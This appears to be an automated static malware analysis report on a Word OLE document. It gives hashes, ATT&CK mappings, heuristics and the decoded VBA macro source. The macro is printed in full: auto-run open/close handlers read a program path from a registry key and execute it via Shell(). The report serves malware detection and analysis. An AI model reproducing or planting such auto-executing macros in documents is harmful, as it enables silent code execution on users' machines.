Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 72ced042937967d4…

MALICIOUS

Office (OLE)

42.0 KB Created: 2001-08-15 01:42:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 3f309c7d154e0cb7a3e29097e9c8c09d SHA-1: 34053c8a9793a09bb69bfa7d938aa36c62298ff4 SHA-256: 72ced042937967d417687cdcc0a85c0f5abc64d67540906043f2714ae854e9b7
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample contains VBA macros, specifically a Document_Open macro that calls the Shell() function. This indicates an attempt to execute an external program upon opening the document. The VBA code is designed to check the drive letter of the document's path and, if it's 'A' or 'B', it proceeds to execute a path obtained from the ReadPath() function, likely a second-stage payload. The use of Shell() and the Document_Open auto-execution macro are strong indicators of malicious intent.

Heuristics 4

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3719 bytes
SHA-256: cc5c4bc89439a3fcdbaf9f7bd3cd1bc97a3796e0a17a7af8b35fbd45ba63e62a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Please don't edit these lines,
' can occasion an erroneous functioning of the application.
' Por favor no edite estas lineas,
' puede ocasionar el funcionamiento erróneo de la aplicación.
Option Explicit

Private Sub Document_Close()
MSWordProcedure
End Sub

Private Sub Document_Open()
MSWordProcedure
End Sub

Public Sub MSWordProcedure()
On Error Resume Next
Dim szFullName As String
Dim szPathName As String

szFullName = ActiveDocument.FullName
If UCase(Left(szFullName, 1)) = "A" Or UCase(Left(szFullName, 1)) = "B" Then
 szPathName = ReadPath()
 Shell szPathName
End If
End Sub

Attribute VB_Name = "Functions"
' Please don't edit these lines,
' can occasion an erroneous functioning of the application.
' Por favor no edite estas lineas,
' puede ocasionar el funcionamiento erróneo de la aplicación.
Option Explicit
Global Const REG_SZ As Long = 1
Global Const REG_DWORD As Long = 4
Global Const HKEY_LOCAL_MACHINE = &H80000002
Global Const ERROR_NONE = 0
Global Const KEY_ALL_ACCESS = &H3F

Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Declare Function RegQueryValueExString Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long
Declare Function RegQueryValueExLong Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Long, lpcbData As Long) As Long
Declare Function RegQueryValueExNULL Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As Long, lpcbData As Long) As Long

Public Function QueryValue(lPredefinedKey As Long, sKeyName As String, sValueName As String)
On Error Resume Next
Dim lReturn As Long
Dim hKey As Long
Dim vValue As Variant
        
lReturn = RegOpenKeyEx(lPredefinedKey, sKeyName, 0, KEY_ALL_ACCESS, hKey)
lReturn = QueryValueEx(hKey, sValueName, vValue)
QueryValue = vValue
RegCloseKey (hKey)
End Function

Function QueryValueEx(ByVal lhKey As Long, ByVal szValueName As String, vValue As Variant) As Long
On Error GoTo QueryValueExError
Dim cch As Long
Dim lrc As Long
Dim lType As Long
Dim lValue As Long
Dim sValue As String

lrc = RegQueryValueExNULL(lhKey, szValueName, 0&, lType, 0&, cch)
 If lrc <> ERROR_NONE Then Error 5
  Select Case lType
   
   Case REG_SZ:
    sValue = String(cch, 0)
    lrc = RegQueryValueExString(lhKey, szValueName, 0&, lType, sValue, cch)
    If lrc = ERROR_NONE Then
     vValue = Left$(sValue, cch)
    Else
     vValue = Empty
    End If

    Case REG_DWORD:
     lrc = RegQueryValueExLong(lhKey, szValueName, 0&, lType, lValue, cch)
     If lrc = ERROR_NONE Then vValue = lValue
    
    Case Else
     lrc = -1
    
    End Select

QueryValueExExit:
 QueryValueEx = lrc
 Exit Function

QueryValueExError:
 Resume QueryValueExExit

End Function

Public Function ReadPath() As String
On Error Resume Next
ReadPath = QueryValue(HKEY_LOCAL_MACHINE, "Software\Ktulu", "App")
End Function